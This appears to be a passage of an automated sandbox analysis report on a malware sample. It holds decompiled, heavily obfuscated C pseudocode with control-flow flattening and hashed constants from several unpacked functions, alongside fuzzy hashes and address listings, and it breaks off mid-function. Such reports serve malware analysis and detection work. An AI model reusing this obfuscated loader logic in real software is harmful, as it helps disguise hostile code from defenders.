                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: !yG$,$8b$Q$`=6$`=6$j$j$o9$x0$ $X
                                          • API String ID: 0-3958274775
                                          • Opcode ID: 6fa3091d36e10bc96d47425dac9d8c73d0fcfb7aa7974f7eed797d9726f06c49
                                          • Instruction ID: 87f72d4082a281b95a738b1b6b5a26fb5eafe83f477a6cc87aa4b7612f7fde27
                                          • Opcode Fuzzy Hash: 6fa3091d36e10bc96d47425dac9d8c73d0fcfb7aa7974f7eed797d9726f06c49
                                          • Instruction Fuzzy Hash: 83A166715083819FD358CF65C49A52BFBE2FBC8358F104A1EF196962A0D7B88A49CF47
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 97%
                                          			E006D3895() {
                                          				char _v524;
                                          				signed int _v528;
                                          				signed int _v532;
                                          				intOrPtr _v536;
                                          				signed int _v548;
                                          				intOrPtr _v552;
                                          				intOrPtr _v556;
                                          				intOrPtr _v560;
                                          				intOrPtr _v564;
                                          				intOrPtr _v568;
                                          				intOrPtr _v572;
                                          				intOrPtr _v576;
                                          				char _v580;
                                          				intOrPtr _v584;
                                          				char _v588;
                                          				signed int _v592;
                                          				signed int _v596;
                                          				signed int _v600;
                                          				signed int _v604;
                                          				signed int _v608;
                                          				signed int _v612;
                                          				signed int _v616;
                                          				signed int _v620;
                                          				signed int _v624;
                                          				signed int _v628;
                                          				signed int _v632;
                                          				signed int _v636;
                                          				unsigned int _v640;
                                          				signed int _v644;
                                          				signed int _v648;
                                          				signed int _v652;
                                          				signed int _v656;
                                          				signed int _v660;
                                          				signed int _v664;
                                          				signed int _v668;
                                          				signed int _v672;
                                          				signed int _v676;
                                          				signed int _v680;
                                          				signed int _v684;
                                          				signed int _v688;
                                          				signed int _v692;
                                          				signed int _v696;
                                          				signed int _v700;
                                          				signed int _t281;
                                          				intOrPtr _t284;
                                          				void* _t286;
                                          				void* _t290;
                                          				void* _t294;
                                          				void* _t295;
                                          				char _t297;
                                          				void* _t303;
                                          				intOrPtr _t321;
                                          				signed int _t325;
                                          				signed int _t326;
                                          				signed int _t327;
                                          				signed int _t328;
                                          				signed int* _t331;
                                          
                                          				_t331 =  &_v700;
                                          				_v532 = _v532 & 0x00000000;
                                          				_v528 = _v528 & 0x00000000;
                                          				_t295 = 0x16120aa4;
                                          				_v536 = 0x65127b;
                                          				_v664 = 0x3b49;
                                          				_v664 = _v664 << 5;
                                          				_v664 = _v664 + 0x6a36;
                                          				_v664 = _v664 >> 7;
                                          				_v664 = _v664 ^ 0x00000fa7;
                                          				_v616 = 0x772f;
                                          				_v616 = _v616 ^ 0x73b15b69;
                                          				_v616 = _v616 ^ 0x73b12d46;
                                          				_v604 = 0xe6c8;
                                          				_v604 = _v604 + 0x8155;
                                          				_v604 = _v604 ^ 0x000105e4;
                                          				_v700 = 0xa5d;
                                          				_v700 = _v700 * 0x52;
                                          				_t294 = 0;
                                          				_v700 = _v700 + 0xffffecf8;
                                          				_t325 = 0x58;
                                          				_v700 = _v700 * 0x66;
                                          				_v700 = _v700 ^ 0x014b32de;
                                          				_v684 = 0xc8e0;
                                          				_v684 = _v684 + 0x308b;
                                          				_v684 = _v684 + 0x2664;
                                          				_v684 = _v684 >> 6;
                                          				_v684 = _v684 ^ 0x00006abe;
                                          				_v676 = 0x796a;
                                          				_v676 = _v676 + 0xffff196c;
                                          				_v676 = _v676 + 0xffffd40e;
                                          				_v676 = _v676 ^ 0xd773f48b;
                                          				_v676 = _v676 ^ 0x288ceae9;
                                          				_v612 = 0x157c;
                                          				_v612 = _v612 << 0x10;
                                          				_v612 = _v612 ^ 0x157c11c9;
                                          				_v652 = 0xe7a2;
                                          				_v652 = _v652 / _t325;
                                          				_v652 = _v652 | 0x448e2e0d;
                                          				_v652 = _v652 ^ 0x448e7eb8;
                                          				_v640 = 0x3ee9;
                                          				_v640 = _v640 * 0x5d;
                                          				_v640 = _v640 >> 0xd;
                                          				_v640 = _v640 ^ 0x0000282d;
                                          				_v648 = 0xf425;
                                          				_v648 = _v648 * 9;
                                          				_v648 = _v648 >> 1;
                                          				_v648 = _v648 ^ 0x0004354a;
                                          				_v608 = 0x24ee;
                                          				_v608 = _v608 + 0x809c;
                                          				_v608 = _v608 ^ 0x0000fdeb;
                                          				_v636 = 0x6dae;
                                          				_v636 = _v636 + 0x1c44;
                                          				_v636 = _v636 + 0x2b83;
                                          				_v636 = _v636 ^ 0x0000a12d;
                                          				_v656 = 0xe590;
                                          				_v656 = _v656 >> 2;
                                          				_v656 = _v656 << 7;
                                          				_v656 = _v656 ^ 0x001cffcc;
                                          				_v668 = 0xb9db;
                                          				_v668 = _v668 >> 0xd;
                                          				_v668 = _v668 + 0x89dd;
                                          				_v668 = _v668 | 0xbce2fd3c;
                                          				_v668 = _v668 ^ 0xbce2f9c6;
                                          				_v596 = 0x1790;
                                          				_v596 = _v596 + 0xffff27ec;
                                          				_v596 = _v596 ^ 0xffff59a3;
                                          				_v672 = 0xffb9;
                                          				_v672 = _v672 + 0xffff618d;
                                          				_v672 = _v672 >> 2;
                                          				_t326 = 0x31;
                                          				_v672 = _v672 * 0x75;
                                          				_v672 = _v672 ^ 0x000b38e4;
                                          				_v644 = 0xc4de;
                                          				_v644 = _v644 + 0xbfb6;
                                          				_v644 = _v644 ^ 0xc1434f22;
                                          				_v644 = _v644 ^ 0xc142a5f5;
                                          				_v680 = 0x8a5a;
                                          				_v680 = _v680 | 0x8f6cf4f7;
                                          				_v680 = _v680 + 0x838e;
                                          				_v680 = _v680 + 0xffffa8f9;
                                          				_v680 = _v680 ^ 0x8f6d4033;
                                          				_v660 = 0xe8e2;
                                          				_v660 = _v660 / _t326;
                                          				_t327 = 0x25;
                                          				_v660 = _v660 * 0x78;
                                          				_v660 = _v660 ^ 0x000205be;
                                          				_v688 = 0x9cd0;
                                          				_v688 = _v688 + 0x8e7d;
                                          				_v688 = _v688 * 0x26;
                                          				_v688 = _v688 * 0x51;
                                          				_v688 = _v688 ^ 0x0e0ecd55;
                                          				_v620 = 0xe1b5;
                                          				_v620 = _v620 / _t327;
                                          				_v620 = _v620 ^ 0x00005557;
                                          				_v696 = 0x769d;
                                          				_v696 = _v696 >> 7;
                                          				_v696 = _v696 | 0x5538ae99;
                                          				_v696 = _v696 << 2;
                                          				_v696 = _v696 ^ 0x54e2b31f;
                                          				_v600 = 0xdcef;
                                          				_v600 = _v600 << 6;
                                          				_v600 = _v600 ^ 0x003705ca;
                                          				_v624 = 0x48eb;
                                          				_v624 = _v624 >> 0xd;
                                          				_v624 = _v624 ^ 0x00002379;
                                          				_v692 = 0xfa2c;
                                          				_v692 = _v692 | 0x4759ecfd;
                                          				_v692 = _v692 >> 0xc;
                                          				_v692 = _v692 >> 9;
                                          				_v692 = _v692 ^ 0x000062c4;
                                          				_v632 = 0xbcd9;
                                          				_v632 = _v632 << 4;
                                          				_v632 = _v632 | 0x68c1d353;
                                          				_v632 = _v632 ^ 0x68cbf855;
                                          				_v628 = 0x848;
                                          				_t328 = 0x1c;
                                          				_v628 = _v628 / _t328;
                                          				_v628 = _v628 ^ 0x00001dd4;
                                          				_t324 = _v628;
                                          				_v592 = 0xa720;
                                          				_v592 = _v592 + 0xffff9569;
                                          				_v592 = _v592 ^ 0x00003c8a;
                                          				do {
                                          					while(_t295 != 0x2b0230e) {
                                          						if(_t295 == 0x16120aa4) {
                                          							_t295 = 0x182cddf3;
                                          							continue;
                                          						} else {
                                          							if(_t295 == 0x182cddf3) {
                                          								E006DAAAE(_v604, _v700, _v684,  &_v588, _v676);
                                          								_t331 =  &(_t331[3]);
                                          								_t295 = 0x2f4d7b3a;
                                          								continue;
                                          							} else {
                                          								if(_t295 == 0x1c4d16fa) {
                                          									_t284 = _v584;
                                          									_t297 = _v588;
                                          									_v548 = _v548 & 0x00000000;
                                          									_v576 = _t284;
                                          									_v568 = _t284;
                                          									_v560 = _t284;
                                          									_v552 = _t284;
                                          									_v580 = _t297;
                                          									_v572 = _t297;
                                          									_v564 = _t297;
                                          									_v556 = _t297;
                                          									_t286 = E006CB6DD(_t297, _v600, _t297, _t324, _v624,  &_v580, _v692); // executed
                                          									_t331 =  &(_t331[5]);
                                          									__eflags = _t286;
                                          									_t294 =  !=  ? 1 : _t294;
                                          									_t295 = 0x2a39a402;
                                          									continue;
                                          								} else {
                                          									if(_t295 == 0x2a39a402) {
                                          										E006D4F7D(_v632, _v628, _t324);
                                          									} else {
                                          										if(_t295 == 0x2f4d7b3a) {
                                          											_v588 = _v588 - E006CF46D();
                                          											_t295 = 0x369a1b5f;
                                          											asm("sbb [esp+0x84], edx");
                                          											continue;
                                          										} else {
                                          											_t339 = _t295 - 0x369a1b5f;
                                          											if(_t295 != 0x369a1b5f) {
                                          												goto L16;
                                          											} else {
                                          												_push(_v652);
                                          												_t290 = E006D889D(0x6dc9b0, _v612, _t339);
                                          												_pop(_t303);
                                          												_t321 =  *0x6dca2c; // 0x248300
                                          												_t224 = _t321 + 0x230; // 0x710050
                                          												E006CC680(_t224, _v648, _v608, _t303, _v636,  *0x6dca2c, _t290,  &_v524);
                                          												_t331 =  &(_t331[7]);
                                          												E006D2025(_v656, _t290, _v668, _v596);
                                          												_t295 = 0x2b0230e;
                                          												continue;
                                          											}
                                          										}
                                          									}
                                          								}
                                          							}
                                          						}
                                          						L19:
                                          						return _t294;
                                          					}
                                          					_t281 = E006CB566(_t295, _v664, _v672, _v644, _v616, _v680, _t295, _v660, _v688, 0, _v620, _v696, _v592,  &_v524); // executed
                                          					_t324 = _t281;
                                          					_t331 =  &(_t331[0xc]);
                                          					__eflags = _t281 - 0xffffffff;
                                          					if(__eflags == 0) {
                                          						_t295 = 0x1d984ba2;
                                          						goto L16;
                                          					} else {
                                          						_t295 = 0x1c4d16fa;
                                          						continue;
                                          					}
                                          					goto L19;
                                          					L16:
                                          					__eflags = _t295 - 0x1d984ba2;
                                          				} while (__eflags != 0);
                                          				goto L19;
                                          			}

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID: -($/w$6j$:{M/$:{M/$WU$d&$jy$y#$$
                                          • API String ID: 2962429428-1089002639
                                          • Opcode ID: 5097adaac4783270210199fde2bc1034e987de15a44352282598248cc2bfeff1
                                          • Instruction ID: ad7c9146353370aa76aef044ad6e9ce9e58ca6d2787d90e339b8c7c3d94591e4
                                          • Opcode Fuzzy Hash: 5097adaac4783270210199fde2bc1034e987de15a44352282598248cc2bfeff1
                                          • Instruction Fuzzy Hash: 4CD102715083819FE368CF65C489A5BFBE2BBC4358F108A1EF1D9862A0D7B58549CF47
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 94%
                                          			E006D42DA(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                          				char _v4;
                                          				char _v8;
                                          				signed int _v12;
                                          				intOrPtr _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				unsigned int _v32;
                                          				signed int _v36;
                                          				signed int _v40;
                                          				signed int _v44;
                                          				signed int _v48;
                                          				signed int _v52;
                                          				signed int _v56;
                                          				unsigned int _v60;
                                          				signed int _v64;
                                          				signed int _v68;
                                          				signed int _v72;
                                          				signed int _v76;
                                          				signed int _v80;
                                          				signed int _v84;
                                          				signed int _v88;
                                          				signed int _v92;
                                          				unsigned int _v96;
                                          				signed int _v100;
                                          				signed int _v104;
                                          				signed int _v108;
                                          				signed int _v112;
                                          				signed int _v116;
                                          				signed int _v120;
                                          				signed int _v124;
                                          				signed int _v128;
                                          				intOrPtr _v132;
                                          				signed int _v136;
                                          				signed int _v140;
                                          				signed int _v144;
                                          				intOrPtr _v148;
                                          				signed int _v152;
                                          				signed int _v156;
                                          				signed int _v160;
                                          				signed int _v164;
                                          				signed int _v168;
                                          				signed int _v172;
                                          				void* _t336;
                                          				intOrPtr _t357;
                                          				intOrPtr _t361;
                                          				void* _t365;
                                          				signed int _t368;
                                          				intOrPtr _t379;
                                          				intOrPtr _t380;
                                          				void* _t413;
                                          				signed int _t421;
                                          				signed int _t422;
                                          				signed int _t423;
                                          				signed int _t424;
                                          				signed int _t425;
                                          				signed int _t426;
                                          				signed int _t427;
                                          				intOrPtr* _t428;
                                          				signed int _t431;
                                          				signed int* _t437;
                                          				void* _t439;
                                          
                                          				_t380 = __ecx;
                                          				_push(_a16);
                                          				_v148 = __ecx;
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__edx);
                                          				_push(__ecx);
                                          				E006C602B(_t336);
                                          				_v32 = 0x4bc1;
                                          				_t437 =  &(( &_v172)[6]);
                                          				_v32 = _v32 >> 0xf;
                                          				_v32 = _v32 ^ 0x000002f8;
                                          				_t379 = 0;
                                          				_v168 = 0xbc3a;
                                          				_t431 = 0x3b64c246;
                                          				_v168 = _v168 >> 0xa;
                                          				_t435 = 0;
                                          				_v168 = _v168 << 1;
                                          				_v168 = _v168 << 9;
                                          				_v168 = _v168 ^ 0x0000918a;
                                          				_v96 = 0x296c;
                                          				_v96 = _v96 ^ 0xfe254c59;
                                          				_v96 = _v96 >> 0xf;
                                          				_v96 = _v96 ^ 0x0001a08f;
                                          				_v52 = 0x7e94;
                                          				_v52 = _v52 + 0xffff276a;
                                          				_v52 = _v52 ^ 0xffffb392;
                                          				_v156 = 0x71e;
                                          				_v156 = _v156 << 0xa;
                                          				_v156 = _v156 ^ 0x91e5be42;
                                          				_v156 = _v156 | 0xf592e812;
                                          				_v156 = _v156 ^ 0xf5fb9c3d;
                                          				_v60 = 0xbf5e;
                                          				_v60 = _v60 >> 7;
                                          				_v60 = _v60 ^ 0x00001130;
                                          				_v112 = 0x687f;
                                          				_v112 = _v112 | 0xf46ca00f;
                                          				_t421 = 0x35;
                                          				_v112 = _v112 * 0x78;
                                          				_v112 = _v112 ^ 0x930cd2b7;
                                          				_v152 = 0xc857;
                                          				_v152 = _v152 << 5;
                                          				_v152 = _v152 | 0x37c6acdc;
                                          				_v152 = _v152 + 0xffffd100;
                                          				_v152 = _v152 ^ 0x37df0477;
                                          				_v144 = 0xf477;
                                          				_v144 = _v144 >> 2;
                                          				_v144 = _v144 << 5;
                                          				_v144 = _v144 | 0xf3531cc7;
                                          				_v144 = _v144 ^ 0xf357d736;
                                          				_v120 = 0xcb9;
                                          				_v120 = _v120 + 0xe3f9;
                                          				_v120 = _v120 ^ 0x6ced8dd9;
                                          				_v120 = _v120 ^ 0x6ced4b8c;
                                          				_v20 = 0x5e2b;
                                          				_v20 = _v20 + 0xffff1e4f;
                                          				_v20 = _v20 ^ 0xffff4ba5;
                                          				_v124 = 0x4b0e;
                                          				_v124 = _v124 / _t421;
                                          				_t422 = 0x44;
                                          				_v124 = _v124 / _t422;
                                          				_v124 = _v124 ^ 0x00000f50;
                                          				_v92 = 0x1f74;
                                          				_v92 = _v92 + 0xffffb151;
                                          				_v92 = _v92 ^ 0xde981c2c;
                                          				_v92 = _v92 ^ 0x2167c13f;
                                          				_v48 = 0x349e;
                                          				_v48 = _v48 | 0xa536c816;
                                          				_v48 = _v48 ^ 0xa536ef12;
                                          				_v172 = 0xab81;
                                          				_t423 = 0x46;
                                          				_v172 = _v172 * 0x33;
                                          				_v172 = _v172 + 0xffff1acb;
                                          				_v172 = _v172 ^ 0xbb3feb59;
                                          				_v172 = _v172 ^ 0xbb1e804f;
                                          				_v72 = 0x6207;
                                          				_v72 = _v72 + 0xffff8a84;
                                          				_v72 = _v72 ^ 0xffffdea5;
                                          				_v80 = 0xb702;
                                          				_v80 = _v80 * 0x71;
                                          				_v80 = _v80 + 0xffff1180;
                                          				_v80 = _v80 ^ 0x004fd1d8;
                                          				_v40 = 0x81cb;
                                          				_v40 = _v40 * 0x24;
                                          				_v40 = _v40 ^ 0x001275f3;
                                          				_v88 = 0x5eb0;
                                          				_v88 = _v88 >> 3;
                                          				_v88 = _v88 + 0x92b4;
                                          				_v88 = _v88 ^ 0x0000b644;
                                          				_v160 = 0x12e7;
                                          				_v160 = _v160 ^ 0x069a79b3;
                                          				_v160 = _v160 / _t423;
                                          				_v160 = _v160 << 0xd;
                                          				_v160 = _v160 ^ 0x04c33b64;
                                          				_v84 = 0xf1f4;
                                          				_v84 = _v84 | 0x342cde3b;
                                          				_t424 = 0x1c;
                                          				_v84 = _v84 / _t424;
                                          				_v84 = _v84 ^ 0x01dd3282;
                                          				_v116 = 0xb146;
                                          				_t425 = 0x4f;
                                          				_v116 = _v116 * 0x6c;
                                          				_v116 = _v116 + 0xbfc7;
                                          				_v116 = _v116 ^ 0x004bdc24;
                                          				_v76 = 0x885c;
                                          				_v76 = _v76 >> 3;
                                          				_v76 = _v76 ^ 0x00003fd1;
                                          				_v56 = 0xb3ed;
                                          				_v56 = _v56 + 0xffff0d01;
                                          				_v56 = _v56 ^ 0xffffed6a;
                                          				_v108 = 0xc622;
                                          				_v108 = _v108 | 0x10712732;
                                          				_v108 = _v108 ^ 0x74f95923;
                                          				_v108 = _v108 ^ 0x648892da;
                                          				_v128 = 0x5bd2;
                                          				_v128 = _v128 + 0x6edf;
                                          				_v128 = _v128 >> 2;
                                          				_v128 = _v128 ^ 0x00004896;
                                          				_v164 = 0xe1b;
                                          				_v164 = _v164 / _t425;
                                          				_v164 = _v164 + 0xf341;
                                          				_v164 = _v164 >> 0xb;
                                          				_v164 = _v164 ^ 0x00001a6d;
                                          				_v104 = 0x25ae;
                                          				_v104 = _v104 ^ 0xe14689b4;
                                          				_v104 = _v104 ^ 0x501c8677;
                                          				_v104 = _v104 ^ 0xb15a3e2e;
                                          				_v100 = 0xf2b8;
                                          				_v100 = _v100 >> 4;
                                          				_v100 = _v100 + 0x7f8b;
                                          				_v100 = _v100 ^ 0x0000c2a8;
                                          				_v64 = 0x78fc;
                                          				_t426 = 0x2a;
                                          				_v64 = _v64 / _t426;
                                          				_v64 = _v64 ^ 0x000003c6;
                                          				_v28 = 0x315;
                                          				_v28 = _v28 | 0x8467cf1c;
                                          				_v28 = _v28 ^ 0x84678c6c;
                                          				_v36 = 0x48e3;
                                          				_v36 = _v36 << 0x10;
                                          				_v36 = _v36 ^ 0x48e34564;
                                          				_v140 = 0xd9da;
                                          				_v140 = _v140 ^ 0xccfa4b87;
                                          				_v140 = _v140 >> 8;
                                          				_v140 = _v140 + 0xb0ba;
                                          				_v140 = _v140 ^ 0x00cde1b8;
                                          				_v44 = 0xbd19;
                                          				_v44 = _v44 >> 0xc;
                                          				_v44 = _v44 ^ 0x000065c0;
                                          				_v136 = 0xd203;
                                          				_v136 = _v136 | 0x5349dfd2;
                                          				_v136 = _v136 + 0xffffa76d;
                                          				_v136 = _v136 ^ 0xc21cb162;
                                          				_v136 = _v136 ^ 0x91553623;
                                          				_v24 = 0x8da7;
                                          				_v24 = _v24 + 0xffff55dc;
                                          				_v24 = _v24 ^ 0xffffe382;
                                          				_v68 = 0xcfb5;
                                          				_t427 = 0x28;
                                          				_v68 = _v68 / _t427;
                                          				_v68 = _v68 ^ 0x00000530;
                                          				_t428 = _v12;
                                          				_t357 = _v132;
                                          				while(1) {
                                          					L1:
                                          					while(1) {
                                          						_t439 = _t431 - 0x28e290b2;
                                          						if(_t439 > 0) {
                                          							goto L18;
                                          						}
                                          						L3:
                                          						if(_t439 == 0) {
                                          							_t386 = _t379;
                                          							_t365 = E006DA970(_t379, _v112, _v152, _v144,  &_v4, _v120, _t380, _t380, _a12, _v20, _t380, _v124, _t380,  &_v12, _t380, _t380, _v92);
                                          							_t437 =  &(_t437[0xf]);
                                          							if(_t365 == 0) {
                                          								L24:
                                          								_t431 = 0x1c1c4d3a;
                                          								goto L11;
                                          							} else {
                                          								_t368 = E006D8C8F(_t386);
                                          								_t431 = 0x30519b83;
                                          								_t357 = _v12 * 0x2c + _t379;
                                          								_v132 = _t357;
                                          								_t428 =  >=  ? _t379 : (_t368 & 0x0000001f) * 0x2c + _t379;
                                          								goto L12;
                                          							}
                                          							L34:
                                          						} else {
                                          							if(_t431 == _t413) {
                                          								E006D94DB(_v160, _v84, _t435,  &_v8, _v116, _v136, _v16, _v76);
                                          								_t431 =  !=  ? 0x33392e52 : 0x221cfa57;
                                          								_t357 = E006C5FB2(_v56, _v108, _v16);
                                          								_t437 =  &(_t437[8]);
                                          								L29:
                                          								_t380 = _v148;
                                          								_t413 = 0x10c975df;
                                          								goto L30;
                                          							} else {
                                          								if(_t431 == 0x1c1c4d3a) {
                                          									E006CF536(_v100, _v64, _v28, _t435);
                                          									_t431 = 0x205a5796;
                                          									goto L11;
                                          								} else {
                                          									if(_t431 == 0x205a5796) {
                                          										return E006CF536(_v36, _v140, _v44, _t379);
                                          									}
                                          									if(_t431 == 0x221cfa57) {
                                          										_t428 = _t428 + 0x2c;
                                          										asm("sbb esi, esi");
                                          										_t431 = (_t431 & 0x14354e49) + 0x1c1c4d3a;
                                          										continue;
                                          									} else {
                                          										if(_t431 != 0x2413af03) {
                                          											L30:
                                          											if(_t431 != 0x1b07e5ae) {
                                          												_t357 = _v132;
                                          												while(1) {
                                          													_t439 = _t431 - 0x28e290b2;
                                          													if(_t439 > 0) {
                                          														goto L18;
                                          													}
                                          													goto L3;
                                          												}
                                          												goto L18;
                                          											}
                                          										} else {
                                          											_push(_t380);
                                          											_push(_t380);
                                          											_t357 = E006C8736(0x20000); // executed
                                          											_t379 = _t357;
                                          											if(_t379 != 0) {
                                          												_t431 = 0x2c9da08a;
                                          												L11:
                                          												_t357 = _v132;
                                          												L12:
                                          												_t380 = _v148;
                                          												goto L1;
                                          											}
                                          										}
                                          									}
                                          								}
                                          							}
                                          						}
                                          						L33:
                                          						return _t357;
                                          						goto L34;
                                          						L18:
                                          						if(_t431 == 0x2c9da08a) {
                                          							_push(_t380);
                                          							_push(_t380);
                                          							_t357 = E006C8736(0x2000);
                                          							_t435 = _t357;
                                          							if(_t357 == 0) {
                                          								_t431 = 0x205a5796;
                                          								goto L29;
                                          							} else {
                                          								_t431 = 0x28e290b2;
                                          								goto L11;
                                          							}
                                          						} else {
                                          							if(_t431 == 0x30519b83) {
                                          								_t361 = E006CF65F(_v68, _v72, _v80, _v40,  *_t428, _a12, _v88);
                                          								_t380 = _v148;
                                          								_t437 =  &(_t437[5]);
                                          								_v16 = _t361;
                                          								_t357 = _v132;
                                          								_t413 = 0x10c975df;
                                          								_t431 =  !=  ? 0x10c975df : 0x221cfa57;
                                          								continue;
                                          							} else {
                                          								if(_t431 == 0x33392e52) {
                                          									E006D7830(_v128, _t380, _t435, _v164, _v104, _v24);
                                          									_t437 =  &(_t437[4]);
                                          									goto L24;
                                          								} else {
                                          									if(_t431 != 0x3b64c246) {
                                          										goto L30;
                                          									} else {
                                          										_t431 = 0x2413af03;
                                          										continue;
                                          									}
                                          								}
                                          							}
                                          						}
                                          						goto L33;
                                          					}
                                          				}
                                          			}
                                          0x006d473d
                                          0x006d4748
                                          0x006d4750
                                          0x006d4758
                                          0x006d475d
                                          0x006d4765
                                          0x006d476d
                                          0x006d4778
                                          0x006d4780
                                          0x006d478b
                                          0x006d4793
                                          0x006d479b
                                          0x006d47a3
                                          0x006d47ab
                                          0x006d47b3
                                          0x006d47be
                                          0x006d47c9
                                          0x006d47d4
                                          0x006d47e0
                                          0x006d47e3
                                          0x006d47e7
                                          0x006d47ef
                                          0x006d47f6
                                          0x006d47fa
                                          0x006d47fa
                                          0x006d47ff
                                          0x006d47ff
                                          0x006d4805
                                          0x00000000
                                          0x00000000
                                          0x006d480b
                                          0x006d480b
                                          0x006d4939
                                          0x006d494b
                                          0x006d4950
                                          0x006d4955
                                          0x006d49e0
                                          0x006d49e0
                                          0x00000000
                                          0x006d495b
                                          0x006d4966
                                          0x006d496e
                                          0x006d4980
                                          0x006d4984
                                          0x006d4988
                                          0x00000000
                                          0x006d4988
                                          0x00000000
                                          0x006d4811
                                          0x006d4813
                                          0x006d48d7
                                          0x006d48fa
                                          0x006d48fd
                                          0x006d4902
                                          0x006d4a70
                                          0x006d4a70
                                          0x006d4a74
                                          0x00000000
                                          0x006d4819
                                          0x006d481f
                                          0x006d48a2
                                          0x006d48a9
                                          0x00000000
                                          0x006d4821
                                          0x006d4827
                                          0x00000000
                                          0x006d4aa3
                                          0x006d4833
                                          0x006d4877
                                          0x006d487c
                                          0x006d4884
                                          0x00000000
                                          0x006d4835
                                          0x006d483b
                                          0x006d4a79
                                          0x006d4a7f
                                          0x006d4a81
                                          0x006d47ff
                                          0x006d47ff
                                          0x006d4805
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x006d4805
                                          0x00000000
                                          0x006d47ff
                                          0x006d4841
                                          0x006d4850
                                          0x006d4851
                                          0x006d4857
                                          0x006d485c
                                          0x006d4862
                                          0x006d4868
                                          0x006d486d
                                          0x006d486d
                                          0x006d4871
                                          0x006d4871
                                          0x00000000
                                          0x006d4871
                                          0x006d4862
                                          0x006d483b
                                          0x006d4833
                                          0x006d481f
                                          0x006d4813
                                          0x006d4aae
                                          0x006d4aae
                                          0x00000000
                                          0x006d4990
                                          0x006d4996
                                          0x006d4a4d
                                          0x006d4a4e
                                          0x006d4a54
                                          0x006d4a59
                                          0x006d4a5f
                                          0x006d4a6b
                                          0x00000000
                                          0x006d4a61
                                          0x006d4a61
                                          0x00000000
                                          0x006d4a61
                                          0x006d499c
                                          0x006d49a2
                                          0x006d4a10
                                          0x006d4a15
                                          0x006d4a19
                                          0x006d4a1e
                                          0x006d4a25
                                          0x006d4a2e
                                          0x006d4a33
                                          0x00000000
                                          0x006d49a4
                                          0x006d49aa
                                          0x006d49d8
                                          0x006d49dd
                                          0x00000000
                                          0x006d49ac
                                          0x006d49b2
                                          0x00000000
                                          0x006d49b8
                                          0x006d49b8
                                          0x00000000
                                          0x006d49b8
                                          0x006d49b2
                                          0x006d49aa
                                          0x006d49a2
                                          0x00000000
                                          0x006d4996
                                          0x006d47ff

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: +^$R.93$R.93$RESCDIR$dEH$l)
                                          • API String ID: 0-1973027218
                                          • Opcode ID: 6dae183150793ffe9c3d1d0d0277e954d08126b822ad90e5e8a4cc44d4105b4e
                                          • Instruction ID: aad4cc4320219f64496899540c9b52d88c3581f3ef7847782416485997012bb2
                                          • Opcode Fuzzy Hash: 6dae183150793ffe9c3d1d0d0277e954d08126b822ad90e5e8a4cc44d4105b4e
                                          • Instruction Fuzzy Hash: 960234719083819FE3A8CF25C48AA5BFBE2FBC4354F10891DE5D996260DBB58949CF43
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 96%
                                          			E006D02C3() {
                                          				char _v524;
                                          				intOrPtr _v548;
                                          				char _v564;
                                          				intOrPtr _v568;
                                          				intOrPtr _v572;
                                          				intOrPtr _v576;
                                          				intOrPtr _v580;
                                          				intOrPtr _v584;
                                          				char _v588;
                                          				signed int _v592;
                                          				signed int _v596;
                                          				signed int _v600;
                                          				signed int _v604;
                                          				signed int _v608;
                                          				signed int _v612;
                                          				signed int _v616;
                                          				signed int _v620;
                                          				signed int _v624;
                                          				signed int _v628;
                                          				signed int _v632;
                                          				signed int _v636;
                                          				signed int _v640;
                                          				signed int _v644;
                                          				signed int _v648;
                                          				signed int _v652;
                                          				signed int _v656;
                                          				signed int _v660;
                                          				signed int _v664;
                                          				signed int _v668;
                                          				signed int _v672;
                                          				signed int _v676;
                                          				signed int _t245;
                                          				signed int _t247;
                                          				void* _t249;
                                          				signed int _t254;
                                          				void* _t255;
                                          				intOrPtr _t256;
                                          				signed int _t258;
                                          				signed int _t259;
                                          				signed int _t260;
                                          				signed int _t261;
                                          				signed int _t262;
                                          				signed int _t263;
                                          				signed int _t264;
                                          				signed int _t265;
                                          				signed int _t266;
                                          				signed int _t267;
                                          				signed int _t290;
                                          				void* _t293;
                                          				void* _t298;
                                          				signed int* _t300;
                                          
                                          				_t300 =  &_v676;
                                          				_v580 = 0x66ae1;
                                          				_v576 = 0xbd1a2;
                                          				_v572 = 0x272c23;
                                          				_t258 = 0x33;
                                          				_t256 = 0;
                                          				_t293 = 0x3b419076;
                                          				_v568 = 0;
                                          				_v640 = 0x1372;
                                          				_v640 = _v640 / _t258;
                                          				_v640 = _v640 | 0x4a3401ed;
                                          				_v640 = _v640 ^ 0x4a34016d;
                                          				_v660 = 0x5e98;
                                          				_v660 = _v660 >> 0xe;
                                          				_v660 = _v660 | 0x7267fa90;
                                          				_t259 = 0x75;
                                          				_v660 = _v660 / _t259;
                                          				_v660 = _v660 ^ 0x00fa5318;
                                          				_v652 = 0x5e75;
                                          				_v652 = _v652 << 0x10;
                                          				_v652 = _v652 + 0x48dc;
                                          				_t260 = 0x18;
                                          				_v652 = _v652 / _t260;
